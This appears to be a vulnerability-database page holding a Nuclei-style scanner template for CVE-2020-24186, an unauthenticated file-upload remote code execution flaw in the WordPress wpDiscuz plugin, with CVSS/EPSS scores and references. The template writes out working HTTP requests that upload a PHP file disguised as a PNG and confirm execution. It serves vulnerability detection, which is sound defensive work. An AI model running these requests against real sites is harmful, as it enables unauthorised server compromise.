CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
100.0%
WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
id: CVE-2020-24186
info:
name: WordPress wpDiscuz <=7.0.4 - Remote Code Execution
author: Ganofins
severity: critical
description: WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
impact: |
Successful exploitation of this vulnerability can lead to arbitrary code execution on the affected WordPress site.
remediation: |
Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability.
reference:
- https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-24186
- https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
- http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2020-24186
cwe-id: CWE-434
epss-score: 0.97489
epss-percentile: 0.99973
cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: gvectors
product: wpdiscuz
framework: wordpress
tags: cve,cve2020,rce,fileupload,packetstorm,wordpress,wp-plugin,intrusive,gvectors
http:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
Origin: {{BaseURL}}
Referer: {{BaseURL}}
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="action"
wmuUploadFiles
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmu_nonce"
{{wmuSecurity}}
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmuAttachmentsData"
undefined
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
Content-Type: image/png
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
<?php phpinfo();?>
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="postId"
1
------WebKitFormBoundary88AhjLimsDMHU1Ak--
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'success":true'
- 'fullname'
- 'shortname'
- 'url'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: wmuSecurity
group: 1
regex:
- 'wmuSecurity":"([a-z0-9]+)'
internal: true
part: body
- type: regex
group: 1
regex:
- '"url":"([a-z:\\/0-9-.]+)"'
part: body
# digest: 4a0a00473045022072ed0f4b5782100ff0dee8c88d2f3d5fe97194113652c1db44b0c64922842561022100929951c15416da76ada640267baafb313d4fde4abed2bdfc1e9783b5f6d0a279:922c64590222798bb761d5b6d8e72950
packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html
github.com/ARPSyndicate/cvemon
github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
nvd.nist.gov/vuln/detail/CVE-2020-24186
www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
100.0%